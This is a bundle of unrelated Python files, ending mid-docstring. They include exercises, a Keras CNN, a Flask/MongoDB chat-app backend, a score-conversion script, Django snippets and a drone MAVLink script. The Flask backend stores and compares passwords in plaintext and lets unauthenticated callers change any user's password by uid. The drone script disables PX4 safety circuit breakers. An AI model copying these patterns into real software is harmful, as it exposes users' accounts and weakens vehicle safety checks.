n1 = int(input('Digite o primeiro termo da PA: '))
r = int(input('Digite a razão da PA: '))
n = n1
aux = 1
while(aux != 11):
n = n1 + r*(aux-1)
print(n, end=' -> ')
aux += 1
print('fim')
|
import numpy as np
import logging
from pprint import pformat
from keras.models import Model
from keras.layers import *
from pelesent.models import NeuralNetwork
logger = logging.getLogger(__name__)
class CNN(NeuralNetwork):
def build(self, nb_filter=100, filter_length=3, stride=1, pool_length=3, cnn_activation='relu',
nb_hidden=200, rnn='LSTM', rnn_activation='sigmoid', dropout_rate=0.5, verbose=True):
logger.info('Building...')
inputs = []
sequence = Input(name='input_source', shape=(self.input_length, ), dtype='int32')
embedded = Embedding(self.emb_vocab_size, self.emb_size, input_length=self.input_length, weights=[self.emb_weights])(sequence)
drop = Dropout(0.2)(embedded)
cnn1d = Convolution1D(nb_filter=200, filter_length=3, activation='relu', subsample_length=stride)(drop)
maxp = GlobalMaxPooling1D()(cnn1d)
dense = Dense(200, activation='relu')(maxp)
drop2 = Dropout(0.2)(dense)
output = Dense(output_dim=self.nb_classes, activation='softmax', name='output_source')(drop2)
self.classifier = Model(input=[sequence], output=output)
logger.info('Compiling...')
self._compile()
if verbose:
self._summary()
def _compile(self):
self.classifier.compile(optimizer='rmsprop', loss='categorical_crossentropy')
def _summary(self):
self.classifier.summary()
logger.debug('Model built: {}'.format(pformat(self.classifier.get_config())))
|
from flask import Flask
from flask import request
import proto.Register_pb2 as Register
import proto.Personal_pb2 as Personal
import proto.Friend_pb2 as Friend
import proto.Basic_pb2 as Basic
import proto.Message_pb2 as Message
from src.db import Mongo
mongo = Mongo()
app = Flask("AI ins")
# 注册登录相关部分页面与处理函数
@app.route('/login', methods=['POST'])
def login():
req = Register.RegisterReq()
data = request.data
req.ParseFromString(data)
print(req)
rsp = Register.RegisterRsp()
res = mongo.find_by_name(req.username)
# 不含昵称则是登录请求
if req.nickname == '':
if res is None or req.password != res['password']:
rsp.resultCode = 2
else:
rsp.resultCode = 0
rsp.uid = res['uid']
else: # 含有昵称是注册请求
if res is None:
rsp.resultCode = 0
rsp.uid = mongo.login_add(req.username, req.nickname, req.password)
else:
rsp.resultCode = 1
return rsp.SerializeToString()
# 用户设置相关部分页面与处理函数
@app.route('/setting', methods=['POST'])
def setting():
req = Personal.SettingReq()
data = request.data
req.ParseFromString(data)
errCode = 0
msg = ""
if req.type == 0:
req = req.iconReq
errCode,msg = process_iconreq(req)
elif req.type == 1:
req = req.nicknameReq
errCode,msg = process_nicknamereq(req)
elif req.type == 2:
req = req.passwordReq
errCode,msg = process_password(req)
else:
errCode = 3
msg = "Unknown type"
rsp = Personal.SettingRsp()
rsp.resultCode = errCode
rsp.msg = msg
print(rsp)
return rsp.SerializeToString()
def process_iconreq(req):
print('process_iconreq')
uid = req.uid
data = req.icon
res = mongo.find_by_uid(uid)
if res is None:
return 4,'uid not found'
mongo.setting_reset(res, 'icon', data)
return 0,'ok'
def process_nicknamereq(req):
print('process_nicknamereq')
uid = req.uid
name = req.nickname
res = mongo.find_by_uid(uid)
if res is None:
return 4,'uid not found'
mongo.setting_reset(res, 'nickname', name)
return 0,'ok'
# password 检查交给本地
def process_password(req):
print('process_password')
uid = req.uid
new = req.new
res = mongo.find_by_uid(uid)
if res is None:
return 4,'uid not found'
mongo.setting_reset(res, 'password', new)
return 0,'ok'
# 添加好友相关
@app.route('/friend', methods=['POST'])
def friend():
print('friend request')
req = Friend.FriendReq()
data = request.data
req.ParseFromString(data)
if req.type == 0:
req = req.searchUserReq
return process_search_user(req)
elif req.type == 1:
req = req.addFriendReq
print('process_friend_add')
mongo.friend_add(req.src, req.dst)
return ''
elif req.type == 2:
req = req.pullAddFriendReq
return process_pull_friend_req(req)
elif req.type == 3:
req = req.removeFriendReq
process_remove_friend_req(req)
return ''
else:
print('unknown error')
return ''
def process_search_user(req):
print('process_search_user')
name = req.username
res = mongo.find_by_name(name)
rsp = Friend.SearchUserRsp()
if res is None:
rsp.resultCode = 1
else:
rsp.resultCode = 0
rsp.nickname = res['nickname']
rsp.username = res['username']
rsp.uid = res['uid']
if 'icon' in res.keys():
rsp.icon = res['icon']
return rsp.SerializeToString()
def process_pull_friend_req(req):
print('process_pull_friend_req')
uid = req.uid
l1 = mongo.friend_find(uid, None, True, False)
l2 = mongo.friend_find(None, uid, None, False)
rsp = Friend.PullAddFriendRsp()
l = l1 + l2
for r in l:
_r = rsp.reqs.add()
_r.src = r['src']
_r.dst = r['dst']
_r.isAccept = r['accept']
print(l)
return rsp.SerializeToString()
def process_remove_friend_req(req):
print('process_remove_friend_req')
mongo.friend_find(req.src, req.dst, req.isAccept, True)
# 查询用户信息
@app.route('/user', methods=['POST'])
def user():
req = Basic.UserDataReq()
data = request.data
req.ParseFromString(data)
rsp = Basic.UserDataRsp()
for u in req.uid:
res = mongo.find_by_uid(u)
if res == None:
continue
r = rsp.userData.add()
r.nickname = res['nickname']
r.username = res['username']
if 'icon' in res.keys():
r.icon = res['icon']
else:
r.icon = b''
r.uid = res['uid']
return rsp.SerializeToString()
# 最近的 Post 信息
@app.route('/post', methods=['POST'])
def search():
req = Message.PostReq()
data = request.data
req.ParseFromString(data)
if req.type == 0:
l = mongo.post_find(req.time)
res = Message.PostRsp()
for r in l:
post = res.posts.add()
post.uid = r['uid']
post.text = r['text']
post.image = r['image']
post.time = r['time']
post.desc = r['desc']
post.username = r['username']
post.nickname = r['nickname']
post.icon = r['icon']
return res.SerializeToString()
elif req.type == 1:
process_post_raw(req)
elif req.type == 2:
process_post_transfer(req)
elif req.type == 3:
process_post_translation(req)
else:
print('Unknown type')
return ''
def process_post_raw(req):
print('process row post')
user = mongo.find_by_uid(req.uid)
r = Message.Post()
r.uid = req.uid
r.time = req.time
r.text = req.text
r.image = req.img1
r.username = user['username']
r.nickname = user['nickname']
if 'icon' in user.keys():
r.icon = user['icon']
mongo.post_add(r)
print(r.text)
def process_post_transfer(req):
print('process transfer post')
def process_post_translation(req):
print('process translation post')
@app.route('/message', methods=['POST'])
def message():
print('message request')
req = Message.MessageReq()
data = request.data
req.ParseFromString(data)
res = mongo.message_find(req.uid, req.time)
rsp = Message.MessageRsp()
for data in res:
r = rsp.msgs.add()
r.src = data['src']
r.dst = data['dst']
r.time = data['time']
r.text = data['text']
r.image = data['image']
return rsp.SerializeToString()
@app.route('/hello')
def hello():
return 'Hello World!'
from geventwebsocket.handler import WebSocketHandler
from geventwebsocket.server import WSGIServer
from geventwebsocket.websocket import WebSocket
client_list = {}
@app.route('/')
def entry():
user = request.environ.get('wsgi.websocket')
if user:
print('WebSocket connected')
uid = 0
try:
uid = int(user.receive())
client_list[uid] = user
print('uid {} connect to server'.format(uid))
while True:
msg = Message.Message()
msg.ParseFromString(user.receive())
print(msg.text)
# user.send(msg.SerializeToString())
dst = client_list[msg.dst]
if dst != None:
dst.send(msg.SerializeToString())
mongo.message_add(msg)
except BaseException:
print('Connection failed')
print('uid {} leave server'.format(uid))
client_list[uid] = None
return 'good bye'
if __name__ == '__main__':
http_server = WSGIServer(('192.168.101.65', 5000), application=app, handler_class=WebSocketHandler)
http_server.serve_forever()
'''
数据库使用 mongodb 存储
各个界面:
0. / 主界面, 暂无功能
1. /login 登录界面, 负责处理登录请求
2. /post 附近的消息, 请求时返回
3. /setting 设置信息
4. /friend 添加好友
5. /user 查询用户信息
6. /message 获取消息记录
resultCode:
1: 注册用户名重复
2: 登录密码错误或用户名不存在
3: setting 请求 type 不合法
4: setting uid not found
5. friend type error
'''
|
# -*- coding: utf-8 -*-
class Solution:
DIRECTIONS = [(-1, 0), (0, 1), (1, 0), (0, -1)]
def surfaceArea(self, grid):
result = 0
for i in range(len(grid)):
for j in range(len(grid[0])):
result += self.singleSurfaceArea(grid, i, j)
return result
def singleSurfaceArea(self, grid, i, j):
result = 2 if grid[i][j] else 0
for neighbor in self.getNeighbors(grid, i, j):
if grid[i][j] > neighbor:
result += grid[i][j] - neighbor
return result
def getNeighbors(self, grid, i, j):
result = []
for h, k in self.DIRECTIONS:
result.append(self.getNeighbor(grid, i + h, j + k))
return result
def getNeighbor(self, grid, i, j):
if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]):
return 0
return grid[i][j]
if __name__ == "__main__":
solution = Solution()
assert 10 == solution.surfaceArea([[2]])
assert 34 == solution.surfaceArea(
[
[1, 2],
[3, 4],
]
)
assert 16 == solution.surfaceArea(
[
[1, 0],
[0, 2],
]
)
assert 32 == solution.surfaceArea(
[
[1, 1, 1],
[1, 0, 1],
[1, 1, 1],
]
)
assert 46 == solution.surfaceArea(
[
[2, 2, 2],
[2, 1, 2],
[2, 2, 2],
]
)
|
try:
from cartotools.crs import * # noqa: F401 F403
from cartotools.osm import location
except ImportError:
# cartotools provides a few more basic projections
from cartopy.crs import * # noqa: F401 F403
# Basic version of the complete cached requests included in cartotools
from .location import location # noqa: F401
from cartopy.feature import NaturalEarthFeature
from cartopy.mpl.geoaxes import GeoAxesSubplot
from ..core.mixins import ShapelyMixin
def countries(**kwargs):
params = {'category': 'cultural',
'name': 'admin_0_countries',
'scale': '10m',
'edgecolor': '#524c50',
'facecolor': 'none',
'alpha': .5,
**kwargs}
return NaturalEarthFeature(**params)
def rivers(**kwargs):
params = {'category': 'physical',
'name': 'rivers_lake_centerlines',
'scale': '10m',
'edgecolor': '#226666',
'facecolor': 'none',
'alpha': .5,
**kwargs}
return NaturalEarthFeature(**params)
def lakes(**kwargs):
params = {'category': 'physical',
'name': 'lakes',
'scale': '10m',
'edgecolor': '#226666',
'facecolor': '#226666',
'alpha': .2,
**kwargs}
return NaturalEarthFeature(**params)
def ocean(**kwargs):
params = {'category': 'physical',
'name': 'ocean',
'scale': '10m',
'edgecolor': '#226666',
'facecolor': '#226666',
'alpha': .2,
**kwargs}
return NaturalEarthFeature(**params)
def _set_default_extent(self):
"""Helper for a default extent limited to the projection boundaries."""
west, south, east, north = self.projection.boundary.bounds
self.set_extent((west, east, south, north), crs=self.projection)
GeoAxesSubplot.set_default_extent = _set_default_extent
def _set_extent(self, shape):
if isinstance(shape, ShapelyMixin):
return self._set_extent(shape.extent)
self._set_extent(shape)
GeoAxesSubplot._set_extent = GeoAxesSubplot.set_extent
GeoAxesSubplot.set_extent = _set_extent
|
# Open test_list.p with dictionary of dictionaries (d)
import pickle
filename = "test_lists.p"
in_file = open(filename, "rb")
d_from_file = pickle.load(in_file)
in_file.close()
# Designate domains and score types again
domains = {
1: "Language",
2: "Spatial",
3: "Motor",
4: "Attention",
5: "Executive Function"
}
score_types = {
1: "Standard Score",
2: "Scaled Score",
3: "T-Score",
4: "Z-Score"
}
# Split d_from_file into individual dictionaries again
language = d_from_file[1]
spatial = d_from_file[2]
motor = d_from_file[3]
attention = d_from_file[4]
executive = d_from_file[5]
# Divide dictionaries into 2 lists: list of tests and list of scoretype number codes
language_t = list(language.keys())
language_s = list(language.values())
spatial_t = list(spatial.keys())
spatial_s = list(spatial.values())
motor_t = list(motor.keys())
motor_s = list(motor.values())
attention_t = list(attention.keys())
attention_s = list(attention.values())
executive_t = list(executive.keys())
executive_s = list(executive.values())
# Enter the scores and store it in a list with the score type code.
# Has to be a list, not a dictionary, because the same pairing may occur multiple times
print("Language")
x = 0
language_scores = []
while x < len(language_s):
print(language_t[x])
t = language_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
language_scores.append(s)
x = x + 1
print(language_scores)
print()
print("Spatial")
x = 0
spatial_scores = []
while x < len(spatial_s):
print(spatial_t[x])
t = spatial_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
spatial_scores.append(s)
x = x + 1
print(spatial_scores)
print()
print("Motor")
x = 0
motor_scores = []
while x < len(motor_s):
print(motor_t[x])
t = motor_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
motor_scores.append(s)
x = x + 1
print(motor_scores)
print()
print("Attention")
x = 0
attention_scores = []
while x < len(attention_s):
print(attention_t[x])
t = attention_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
attention_scores.append(s)
x = x + 1
print(attention_scores)
print()
print("Executive")
x = 0
executive_scores = []
while x < len(executive_s):
print(executive_t[x])
t = executive_s[x]
print(score_types[t])
print()
s = input("Enter Patient's Score: ")
s = float(s)
executive_scores.append(s)
x = x + 1
print(executive_scores)
print()
# Convert all entered scores into a Scaled Score
# For loop based on the list of entered scores for the domain
# Which calculation is performed depends on the list of score type number codes for the domain
print("Language Conversions to Scaled Score")
language_c = []
count = 0
for y in language_scores:
y = float(y)
if language_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif language_s[count] == 2:
c = y
elif language_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif language_s[count] == 4:
c = (y*3) + 10
language_c.append(c)
count = count + 1
print(language_c)
print()
print("Spatial Conversions to Scaled Score")
spatial_c = []
count = 0
for y in spatial_scores:
y = float(y)
if spatial_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif spatial_s[count] == 2:
c = y
elif spatial_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif spatial_s[count] == 4:
c = (y*3) + 10
spatial_c.append(c)
count = count + 1
print(spatial_c)
print()
print("Motor Conversions to Scaled Score")
motor_c = []
count = 0
for y in motor_scores:
y = float(y)
if motor_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif motor_s[count] == 2:
c = y
elif motor_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif motor_s[count] == 4:
c = (y*3) + 10
motor_c.append(c)
count = count + 1
print(motor_c)
print()
print("Attention Conversions to Scaled Score")
attention_c = []
count = 0
for y in attention_scores:
y = float(y)
if attention_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif attention_s[count] == 2:
c = y
elif attention_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif attention_s[count] == 4:
c = (y*3) + 10
attention_c.append(c)
count = count + 1
print(attention_c)
print()
print("Executive Function Conversions to Scaled Score")
executive_c = []
count = 0
for y in executive_scores:
y = float(y)
if executive_s[count] == 1:
step = (y-100)/15
c = (step*3) + 10
elif executive_s[count] == 2:
c = y
elif executive_s[count] == 3:
step = (y-50)/10
c = (step*3) + 10
elif executive_s[count] == 4:
c = (y*3) + 10
executive_c.append(c)
count = count + 1
print(executive_c)
print()
# Create an excel workbook of the results
import xlsxwriter
workbook = xlsxwriter.Workbook("ScoreConversions.xlsx")
worksheet1 = workbook.add_worksheet("Language")
worksheet2 = workbook.add_worksheet("Spatial")
worksheet3 = workbook.add_worksheet("Motor")
worksheet4 = workbook.add_worksheet("Attention")
worksheet5 = workbook.add_worksheet("Executive Function")
#Create Domain labels with room to fill in data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Language")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in language_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in language_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in language_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in language_c:
worksheet1.write(row, column, d)
row = row + 1
#Create Domain labels with room to fill in data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Spatial")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in spatial_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in spatial_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in spatial_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in spatial_c:
worksheet1.write(row, column, d)
row = row + 1
#Create Domain labels with room to fill in or calculate data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Motor")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in motor_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in motor_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in motor_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in motor_c:
worksheet1.write(row, column, d)
row = row + 1
#Create Domain labels with room to fill in or calculate data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Attention")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in attention_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in attention_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in attention_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in attention_c:
worksheet1.write(row, column, d)
row = row + 1
#Create Domain labels with room to fill in or calculate data
worksheet1.write(0, 0, "Domain:")
worksheet1.write(0, 1, "Executive Function")
#Create Labels
worksheet1.write(1, 0, "Tests Administered:")
worksheet1.write(1, 1, "Score Type:")
worksheet1.write(1, 2, "Patient Score:")
worksheet1.write(1, 3, "Converted Scaled Score:")
# Start in next row
row = 2
column = 0
#Fill in data
for a in executive_t:
worksheet1.write(row, column, a)
row = row + 1
row = 2
column = 1
for b in executive_s:
worksheet1.write(row, column, score_types[b])
row = row + 1
row = 2
column = 2
for c in executive_scores:
worksheet1.write(row, column, c)
row = row + 1
row = 2
column = 3
for d in executive_c:
worksheet1.write(row, column, d)
row = row + 1
workbook.close()
|
#!/usr/bin/env python
import os
import sys
import shutil
import datetime
import pyperclip
import subprocess
clipboard_copy = pyperclip.clipboards.init_osx_clipboard()[0]
STATIC_DIR = os.path.join(os.path.dirname(__file__), "static")
if len(sys.argv) == 1:
print "Usage: %s file.jpg [file.jpg ...]" % sys.argv[0]
sys.exit(1)
copy_str = ""
for fname in sys.argv[1:]:
bname = os.path.basename(fname)
if not os.path.exists(fname):
sys.stderr.write("File not found: %s\n" % fname)
sys.exit(1)
if not os.path.exists(STATIC_DIR):
sys.stderr.write("Couldn't find static dir %s\n" % STATIC_DIR)
sys.exit(1)
today = datetime.date.today()
upload_path = os.path.join("uploads",
str(today.year),
str(today.month),
str(today.day))
full_upload_path = os.path.join(STATIC_DIR, upload_path)
if not os.path.exists(full_upload_path):
os.makedirs(full_upload_path)
bname = bname.replace(' ', '_')
target = os.path.join(full_upload_path, bname)
if not os.path.exists(target):
shutil.copy(fname, target)
ext = target.split('.')[-1]
target_sm = target[:-(len(ext) + 1)] + "-640x480." + ext
bname_sm = os.path.basename(target_sm)
if ext in ['jpg', 'jpeg', 'png']:
print target, target_sm
subprocess.check_call(["convert", "-resize", "640x480>", target, target_sm])
copy_str += "<div class='image'><a href='/%s/%s'><img src='/%s/%s' class='uploaded-img' /></a></div>\n" % \
(upload_path, bname, upload_path, bname_sm)
print "Copied %s to %s" % (fname, target)
clipboard_copy(copy_str)
print "Done and copied to clipboard."
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import time
from wgraph.graph import (
load,
search,
Word,
verbose,
Graph,
draw_graph,
add_node,
create_graph,
apply_styles,
)
def distance(graph: Graph, word1: Word, word2: Word) -> int:
graph_path = search(
graph=graph,
start_word=word1,
stop_condition=lambda ref: ref.word == word2,
max_depth=3,
)
if not graph_path:
return -1
return len(graph_path)
def main() -> None:
path = sys.argv[1]
word1 = Word(sys.argv[2])
word2 = Word(sys.argv[3])
t0 = time.time()
graph = load(path)
t1 = time.time()
graph_path = search(
graph=graph,
start_word=word1,
stop_condition=lambda ref: ref.word == word2,
max_depth=3,
)
t2 = time.time()
print("Search time", t2 - t1)
print("Total time", t2 - t0)
g = create_graph(word1)
if graph_path:
print("Distance:", len(graph_path))
print("Start:", word1)
parent = None
for ref in graph_path:
print(">", verbose(ref))
add_node(g, parent, ref, word1)
parent = ref
filename = f"wgraph_distance_{word1}_{word2}"
apply_styles(word1, g).render(filename)
print("Graph written into:", filename)
if __name__ == "__main__":
main()
|
import pytest
from django.urls import reverse
@pytest.mark.django_db
@pytest.mark.parametrize("view", ["inventory:inventory_list"])
def test_view_inventory_list(client, view):
url = reverse(view)
response = client.get(url)
# content = response.content.decode(encoding=response.charset)
assert response.status_code < 400
|
HEX_COLOURS = {"blueviolet": "#8a2be2", "brown": "#a52a2a", "coral": "#ff7f50"}
colour_name = input("Enter a colour name: ")
while colour_name != "":
print("The code for {} is {}".format(colour_name, HEX_COLOURS.get(colour_name)))
colour_name = input("Enter a colour name: ")
|
import RPi.GPIO as GPIO
import time
sensor = 12
value = 0
GPIO.setmode(GPIO.BOARD)
GPIO.setup(sensor, GPIO.IN)
while True:
print GPIO.input(sensor)
|
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
def still_alive(function):
def wrap(request, *args, **kwargs):
if not request.user.is_authenticated():
#TODO add the 'next': request.GET.get('next', '')}
return HttpResponseRedirect(reverse('index'))
if request.user.character_set.filter(alive=True).exists():
return function(request, *args, **kwargs)
else:
return HttpResponseRedirect(reverse('create_character'))
return wrap
|
from __future__ import print_function
# import mavutil
from pymavlink import mavutil
from dronekit import connect, VehicleMode
import time
# create the connection
# From topside computer
connection_string = '/dev/ttyACM0'
master = mavutil.mavlink_connection(connection_string)
master.wait_heartbeat()
master.mav.param_request_list_send(master.target_system, master.target_component)
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_IO_SAFETY', -1)
print('param recv complete')
'''
while True:
try:
message = master.recv_match(type='PARAM_VALUE', blocking=True).to_dict()
print('name: %s\tvalue: %f' % (message['param_id'].decode("utf-8"), message['param_value']))
except Exception as e:
print(e)
exit(0)
'''
time.sleep(0.5)
# Set io process
master.mav.param_set_send(master.target_system, master.target_component, b'CBRK_IO_SAFETY', 0, mavutil.mavlink.MAV_PARAM_TYPE_INT32)
print('io set complete')
# read ACK, IMPORTANT
num=0
message=None
while num<50:
try:
message = master.recv_match().to_dict()
num=num+1
except Exception as e:
break
# request param to confirm
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_IO_SAFETY', -1)
print('io request complete')
# USB set
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_USB_CHK', -1)
master.mav.param_set_send(master.target_system, master.target_component, b'CBRK_USB_CHK', 0, mavutil.mavlink.MAV_PARAM_TYPE_INT32)
# read ACK, IMPORTANT
num=0
message=None
while num<50:
try:
message = master.recv_match().to_dict()
num=num+1
except Exception as e:
break
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_USB_CHK', -1)
print('USB check complete')
'''
# set SUPPLY
#
#
master.mav.param_set_send(master.target_system, master.target_component, b'CBRK_SUPPLY_CHK', 0, mavutil.mavlink.MAV_PARAM_TYPE_INT32)
# read ACK, IMPORTANT
num=0
message=None
while num<50:
try:
message = master.recv_match().to_dict()
#print('name: %s\tvalue: %f' % (message['param_id'].decode("utf-8"), message['param_value']))
num=num+1
except Exception as e:
break
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_SUPPLY_CHK', -1)
print('SUPPLY check complete')
'''
#reboot
master.close()
vehicle = connect(connection_string, wait_ready=True)
vehicle.reboot()
print('reboot?')
|
from flask import request, jsonify
from ..models import DeviceModel, FlowModel
from pa import database as db
from sqlalchemy import asc, desc
import pa
from .summary import get_range_summary
from datetime import datetime, timedelta
def get_device():
try:
devices = db.session.query(FlowModel.mac.label('mac'))
devices = devices.group_by(FlowModel.mac).all()
except Exception as e:
pa.log.error('unable query table {0}: {1}'.format(FlowModel.__tablename__, e))
return 'unable query device', 500
all_device_desc = []
for dev in devices:
try:
device = DeviceModel.query.filter_by(mac=dev.mac).first()
except Exception as e:
pa.log.error('unable query table {0}: {1}'.format(DeviceModel.__tablename__, e))
return 'unable query device', 500
try:
first_appear = FlowModel.query.filter_by(mac=dev.mac).order_by(asc(FlowModel.create_time)).first()
first_appear_time = first_appear.create_time.strftime('%Y-%m-%d %H:%M:%S')
last_appear = FlowModel.query.filter_by(mac=dev.mac).order_by(desc(FlowModel.create_time)).first()
last_appear_time = last_appear.create_time.strftime('%Y-%m-%d %H:%M:%S')
except Exception as e:
pa.log.error('unable query table {0}: {1}'.format(FlowModel.__tablename__, e))
return 'unable query device', 500
try:
secondly = get_range_summary(dev.mac, datetime.now()-timedelta(minutes=1), timedelta(minutes=1))
secondly['download'] = int(secondly['download'] / 60)
secondly['upload'] = int(secondly['upload'] / 60)
hourly = get_range_summary(dev.mac, datetime.now()-timedelta(hours=1), timedelta(hours=1))
daily = get_range_summary(dev.mac, datetime.now()-timedelta(days=1), timedelta(days=1))
monthly = get_range_summary(dev.mac, datetime.now()-timedelta(days=31), timedelta(days=31))
except Exception as e:
str(e)
return 'unable get device summary', 500
device_desc = {
'mac': dev.mac,
'first_record_time': first_appear_time,
'last_record_time': last_appear_time,
'last_record_ip': last_appear.ip,
'secondly': {
'upload': secondly['upload'],
'download': secondly['download']
},
'hourly': {
'upload': hourly['upload'],
'download': hourly['download']
},
'daily': {
'upload': daily['upload'],
'download': daily['download']
},
'monthly': {
'upload': monthly['upload'],
'download': monthly['download']
}
}
if device is not None:
device_desc['name'] = device.name
device_desc['type'] = device.type
device_desc['comment'] = device.comment
device_desc['create_time'] = device.create_time.strftime('%Y-%m-%d %H:%M:%S')
all_device_desc.append(device_desc)
try:
devices = DeviceModel.query.all()
except Exception as e:
pa.log.error('unable query table {0}: {1}'.format(DeviceModel.__tablename__, e))
return 'unable query device', 500
for device in devices:
device_exists = False
for device_desc in all_device_desc:
if device_desc.get('mac') == device.mac:
device_exists = True
break
if device_exists:
continue
all_device_desc.append({
'mac': device.mac,
'name': device.name,
'type': device.type,
'comment': device.comment,
'create_time': device.create_time.strftime('%Y-%m-%d %H:%M:%S')
})
return jsonify(all_device_desc), 200
def set_device():
mac = request.json.get('mac')
device_name = request.json.get('name')
device_type = request.json.get('type')
device_comment = request.json.get('comment')
if mac is None or len(mac) == 0:
return 'mac format error', 400
if device_name is None and device_type is None and device_comment is None:
return 'name, type, comment are None', 400
try:
device = DeviceModel.query.filter_by(mac=mac).first()
except Exception as e:
pa.log.error('unable query table {0}: {1}'.format(DeviceModel.__tablename__, e))
return 'unable query device', 500
create_device = False
if device is None:
create_device = True
device = DeviceModel(mac=mac)
if device is None:
return 'device not found', 400
if device_name is not None:
device.name = device_name
if device_type is not None:
device.type = device_type
if device_comment is not None:
device.comment = device_comment
try:
if create_device:
db.session.add(device)
db.session.commit()
except Exception as e:
pa.log.error('unable write table {0}: {1}'.format(DeviceModel.__tablename__, e))
return 'unable write device', 500
return '', 200
|
from django.db import models
from django.contrib.auth import get_user_model
class HealthEntry(models.Model):
user = models.ForeignKey(
get_user_model(), on_delete=models.CASCADE, null=True, blank=True
)
age = models.IntegerField(default=0)
gender = models.CharField(
choices=(("M", "Male"), ("F", "Female")), default="M", max_length=1,
)
fever = models.BooleanField(default=False)
cough = models.BooleanField(default=False)
difficult_breathing = models.BooleanField(default=False)
self_quarantine = models.BooleanField(default=False)
latitude = models.DecimalField(max_digits=18, decimal_places=15, null=True)
longitude = models.DecimalField(max_digits=18, decimal_places=15, null=True)
unique_id = models.CharField(null=True, blank=True, max_length=15)
creation_timestamp = models.DateTimeField(auto_now_add=True, null=True, blank=True)
class KeyValuePair(models.Model):
name = models.CharField(max_length=50)
value = models.CharField(max_length=100)
|
#!/usr/bin/env python
import os
import sys
import dotenv
BASE_DIR = os.path.join(os.path.dirname(__file__), os.pardir)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
os.environ.setdefault("ENV", "default")
def run_gunicorn_server(addr, port):
"""run application use gunicorn http server
"""
from gunicorn.app.base import Application
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
class DjangoApplication(Application):
def init(self, parser, opts, args):
return {
'bind': '{0}:{1}'.format(addr, port),
'workers': 4,
'timeout': 300,
'accesslog': '-'
}
def load(self):
return application
DjangoApplication().run()
if __name__ == "__main__":
from django.core.management import execute_from_command_line
env_file = os.path.abspath(
os.path.join('%s/envs' % BASE_DIR, "%s.env" % os.getenv('ENV')))
print('*' * 80)
print("Read environment from '{}'".format(env_file))
print('*' * 80)
dotenv.read_dotenv(env_file)
addr = os.getenv('DJANGO_HTTP_ADDR', '127.0.0.1')
port = os.getenv('DJANGO_HTTP_PORT', '8000')
server_type = os.getenv('DJANGO_SERVER_TYPE', 'dev')
if(len(sys.argv) == 2 and sys.argv[1] == 'runserver'):
if server_type != 'dev':
run_gunicorn_server(addr=addr, port=port)
sys.exit(0)
sys.argv.append('%s:%s' % (addr, port))
execute_from_command_line(sys.argv)
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for converting Google Code issues to a format accepted by BitBucket.
Most BitBucket concepts map cleanly to their Google Code equivalent, with the
exception of the following:
- Issue Assignee is called an Owner
- Issue Reporter is called an Author
